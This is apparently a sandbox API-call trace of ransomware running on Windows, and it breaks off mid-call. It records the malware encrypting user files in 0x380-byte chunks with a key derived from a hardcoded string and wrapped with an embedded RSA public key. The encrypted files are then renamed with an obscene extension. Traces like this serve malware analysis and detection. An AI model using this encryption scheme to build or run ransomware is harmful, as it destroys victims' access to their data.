1 [0243.643] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.643] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.643] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.643] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.643] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.643] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.643] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.643] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.643] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.643] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.644] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.644] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.644] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.644] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.644] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.644] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.644] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.644] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.645] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.645] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.645] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.645] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.645] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.645] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.645] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.645] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.645] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.645] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.645] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.645] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.911] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.log"), bFailIfExists=0) returned 1 [0244.282] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.log", dwFileAttributes=0x0) returned 1 [0244.282] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.log.gsg")) returned 1 [0244.284] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USS.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\uss.log.fuck")) returned 1 [0244.285] CryptDestroyHash (hHash=0x28e7df8) returned 1 [0244.285] CryptDestroyKey (hKey=0x28e8078) returned 1 [0244.285] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0244.285] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0244.285] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0244.285] GetLastError () returned 0x0 [0244.285] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00001.jrs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00001.jrs")) returned 0x20 [0244.286] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00001.jrs", dwFileAttributes=0x80) returned 1 [0244.286] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00001.jrs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00001.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0244.286] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00001.jrs.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00001.jrs.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0244.287] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00001.jrs.gsg", dwFileAttributes=0x2) returned 1 [0244.287] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f6348) returned 1 [0244.290] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0244.290] lstrlenA (lpString="SBQbTEZtKSPABbdjOQEwCVKtzMlQm") returned 29 [0244.290] CryptHashData (hHash=0x28e7df8, pbData=0x2857100, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0244.290] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e7df8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e8078) returned 1 [0244.290] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0244.290] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0244.290] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f5358) returned 1 [0244.290] CryptImportPublicKeyInfo (in: hCryptProv=0x28f5358, dwCertEncodingType=0x1, pInfo=0x2935ed0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935f00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935f08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2893fb0) returned 1 [0244.290] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0244.290] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f5600*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f5600*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0244.291] WriteFile (in: hFile=0x5d3c, lpBuffer=0x28f5600*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28f5600*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0244.292] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.294] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.294] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.356] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.357] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.357] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.357] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.357] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.358] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.358] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.358] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.358] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.358] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.358] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.358] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.358] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.359] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.359] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.359] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.359] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.359] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.359] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.359] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.359] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.360] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.360] CryptEncrypt (in: 